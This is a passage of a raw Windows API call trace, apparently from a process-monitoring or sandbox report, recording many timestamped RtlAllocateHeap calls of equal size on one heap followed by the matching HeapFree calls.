(HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x259cd50 [0240.585] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25aff60 [0240.586] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25c3170 [0240.586] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x468) returned 0x4cc5f0 [0240.586] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8b10 | out: hHeap=0x4a0000) returned 1 [0240.586] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25d6380 [0240.587] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25e9590 [0240.588] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x25fc7a0 [0240.588] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x260f9b0 [0240.589] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2622bc0 [0240.589] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2640080 [0240.591] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2653290 [0240.591] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26664a0 [0240.592] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26796b0 [0240.592] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x268c8c0 [0240.593] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x269fad0 [0240.593] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26b2ce0 [0240.593] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26c5ef0 [0240.594] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26d9100 [0240.814] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26ec310 [0240.814] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x26ff520 [0240.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2712730 [0240.815] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2725940 [0240.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2738b50 [0240.816] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x274bd60 [0240.817] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x275ef70 [0240.817] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2772180 [0240.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2785390 [0240.818] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27985a0 [0240.819] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27ab7b0 [0240.819] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27be9c0 [0240.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27d1bd0 [0240.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27e4de0 [0240.820] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x27f7ff0 [0240.821] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x280b200 [0240.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x281e410 [0240.822] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2831620 [0240.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2844830 [0240.823] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2857a40 [0240.824] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x286ac50 [0240.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x287de60 [0240.825] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2891070 [0240.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28a4280 [0240.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28b7490 [0240.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28ca6a0 [0240.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28dd8b0 [0240.827] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x28f0ac0 [0240.828] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2903cd0 [0240.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2916ee0 [0240.829] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x292a0f0 [0240.830] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x293d300 [0240.830] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2950510 [0240.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x698) returned 0x4b8910 [0240.831] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0240.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2963720 [0240.831] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2976930 [0240.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2989b40 [0240.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x299cd50 [0240.832] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29aff60 [0240.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29c3170 [0240.833] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29d6380 [0240.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29e9590 [0240.834] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x29fc7a0 [0240.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a0f9b0 [0240.835] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a22bc0 [0240.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a35dd0 [0240.836] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a48fe0 [0240.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a5c1f0 [0240.837] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a6f400 [0240.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a82610 [0240.838] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2a95820 [0240.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2aa8a30 [0240.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2abbc40 [0240.839] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2acee50 [0240.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ae2060 [0240.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2af5270 [0240.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b08480 [0240.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b1b690 [0240.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b2e8a0 [0240.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b41ab0 [0240.842] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b54cc0 [0240.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b67ed0 [0240.843] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b7b0e0 [0240.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2b8e2f0 [0240.844] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ba1500 [0240.845] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bb4710 [0240.846] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bc7920 [0240.846] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bdab30 [0240.848] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2bedd40 [0240.849] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c00f50 [0240.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c14160 [0240.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c27370 [0240.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c3a580 [0241.068] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c4d790 [0241.069] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c609a0 [0241.070] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c73bb0 [0241.070] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c86dc0 [0241.071] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2c99fd0 [0241.071] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cad1e0 [0241.072] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cc03f0 [0241.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cd3600 [0241.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ce6810 [0241.074] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2cf9a20 [0241.074] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d0cc30 [0241.074] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d1fe40 [0241.075] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d33050 [0241.075] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d46260 [0241.076] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d59470 [0241.078] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d6c680 [0241.078] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d7f890 [0241.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2d92aa0 [0241.080] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2da5cb0 [0241.080] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2db8ec0 [0241.081] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2dcc0d0 [0241.081] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ddf2e0 [0241.082] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2df24f0 [0241.083] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e05700 [0241.084] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e18910 [0241.085] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e40080 [0241.088] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e53290 [0241.088] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e664a0 [0241.089] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e796b0 [0241.090] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e8c8c0 [0241.090] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2e9fad0 [0241.091] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x9e0) returned 0x4cc5f0 [0241.091] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8910 | out: hHeap=0x4a0000) returned 1 [0241.091] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2eb2ce0 [0241.092] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ec5ef0 [0241.092] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2ed9100 [0241.093] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2eec310 [0241.093] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2eff520 [0241.094] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f12730 [0241.094] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f25940 [0241.095] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f38b50 [0241.095] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f4bd60 [0241.096] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f5ef70 [0241.096] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f72180 [0241.097] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f85390 [0241.097] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2f985a0 [0241.098] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2fab7b0 [0241.098] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x13200) returned 0x2fbe9c0 [0241.342] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4cc5f0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d7480 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f7280 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50a490 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x51d6a0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5308b0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x543ac0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x556cd0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x569ee0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x57d0f0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f40080 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f53290 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f664a0 | out: hHeap=0x4a0000) returned 1 [0247.497] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f796b0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f8c8c0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1f9fad0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1fb2ce0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1fc5ef0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1fd9100 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1fec310 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x1fff520 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2012730 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2040080 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2053290 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20664a0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20796b0 | out: hHeap=0x4a0000) returned 1 [0247.498] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x208c8c0 | out: hHeap=0x4a0000) returned 1 [0247.512] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x209fad0 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20b2ce0 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20c5ef0 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20d9100 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20ec310 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x20ff520 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2112730 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2125940 | out: hHeap=0x4a0000) returned 1 [0247.514] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2138b50 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x214bd60 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x215ef70 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2172180 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2185390 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21985a0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21ab7b0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21be9c0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21d1bd0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21e4de0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x21f7ff0 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x220b200 | out: hHeap=0x4a0000) returned 1 [0247.519] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x221e410 | out: hHeap=0x4a0000) returned 1 [0247.520] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2240080 | out: hHeap=0x4a0000) returned 1 [0247.520] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2253290 | out: hHeap=0x4a0000) returned 1 [0247.526] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22664a0 | out: hHeap=0x4a0000) returned 1 [0247.526] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22796b0 | out: hHeap=0x4a0000) returned 1 [0247.526] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x228c8c0 | out: hHeap=0x4a0000) returned 1 [0247.526] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x229fad0 | out: hHeap=0x4a0000) returned 1 [0247.526] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22b2ce0 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22c5ef0 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22d9100 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22ec310 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x22ff520 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2312730 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2325940 | out: hHeap=0x4a0000) returned 1 [0247.527] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2338b50 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x234bd60 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x235ef70 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2372180 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2385390 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23985a0 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23ab7b0 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23be9c0 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23d1bd0 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23e4de0 | out: hHeap=0x4a0000) returned 1 [0247.533] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x23f7ff0 | out: hHeap=0x4a0000) returned 1 [0247.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x240b200 | out: hHeap=0x4a0000) returned 1 [0247.660] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x241e410 | out: hHeap=0x4a0000) returned 1 [0247.660] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2431620 | out: hHeap=0x4a0000) returned 1 [0247.660] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2444830 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2457a40 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x246ac50 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x247de60 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2491070 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24a4280 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24b7490 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24ca6a0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24dd8b0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x24f0ac0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2503cd0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2516ee0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x252a0f0 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x253d300 | out: hHeap=0x4a0000) returned 1 [0247.665] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2550510 | out: hHeap=0x4a0000) returned 1 [0247.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2563720 | out: hHeap=0x4a0000) returned 1 [0247.671] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2576930 | out: hHeap=0x4a0000) returned 1 [0247.672] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x2589b40 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x259cd50 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25aff60 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25c3170 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25d6380 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25e9590 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x25fc7a0 | out: hHeap=0x4a0000) returned 1 [0247.673] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x260f9b0 | out: hHeap=0x4a0000) returned 